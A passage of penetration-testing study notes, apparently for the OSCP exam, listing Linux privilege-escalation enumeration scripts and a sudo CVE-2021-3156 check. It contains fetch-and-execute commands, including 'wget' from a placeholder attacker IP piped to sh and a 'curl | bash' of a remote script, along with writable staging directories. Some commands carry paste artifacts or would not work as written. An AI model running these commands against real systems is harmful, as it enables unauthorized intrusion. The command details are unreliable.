Linux post exploitation scripts

I personally use linpeas (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) as it's well maintained and frequently updated for latest bugs and patches

Words of wisdom

Be careful with what scripts you are executing as auto exploitation is totally restricted in exam and you are going to fail if you done this mistake , even without your intention so ALWAYS first check what you running before executing it , (Must give attention to 'auto-exploitation' word in scripts)

Execution of script

wget http://<Attacker_IP>/<script_name> | sh | tee output.txt

# This will pull file from attacker box and execute it and also store output to txt file

Common Location with writable permissions to download and execute scripts

/tmp
/dev/shm

bangenum.sh (initial linux enumeration)

wget https://raw.githubusercontent.com/bngr/OSCP-Scripts/master/bangenum.sh
sed -i -e 's/\r$//' bangenum.sh
./bangenum.sh

PSPY

What is running, any cron jobs any scripts? Use PSPY to find out

https://github.com/DominicBreuker/pspy

linux-smart-enumeration

https://github.com/diego-treitos/linux-smart-enumeration

SUID search

https://github.com/Anon-Exploiter/SUID3NUM

xploit_installer.py (exploit suggester)

wget https://raw.githubusercontent.com/wwong99/pentest-notes/master/scripts/xploit_installer.py

USAGE: xploit_installer.py <exploit id>

Unix Priv checker

wget https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh
./unix-privesc-check standard > output.txt

linux-local-enum.sh

wget https://raw.githubusercontent.com/Arr0way/linux-local-enumeration-script/master/linux-local-enum.sh

linuxprivchecker.py

wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py

linux-exploit-suggestor.sh

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh

unix-privesc-check.sh

wget https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh

KernelPop

Automated kernel vulnerability enumeration and exploitation

https://github.com/spencerdodd/kernelpop

BaronSamEdit CVE-2021-3156:

LogoGitHub - blasty/CVE-2021-3156GitHub

Link: https://blog.cxaqhq.cn/post/oscp-relia/?_x_tr_sl=zh-TW&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86:~:text=Sudo%20Privilege%20Escalation

Check Your sudo Version

Run:

bashCopyEditsudo --version

Look at the first line of output. Vulnerable versions include:

  • 1.8.2 to 1.8.31p2

  • 1.9.0 to 1.9.5p1

  • Any version below 1.8.31p2 or 1.9.5p2 is likely vulnerable.

Step 2: Test with a Proof of Concept (Safe Way)

  1. Rather than using potentially unsafe PoC code, you can run a known-check script.

  2. Safer test (using a community detection script):

bashCopyEditcurl -s https://raw.githubusercontent.com/blasty/CVE-2021-3156/master/check_sudo_vuln.sh | bash

This script checks for vulnerable versions and attempts a non-exploitative check.

PreviousLinux Manual ExploitationNextKernel Exploitation

Last updated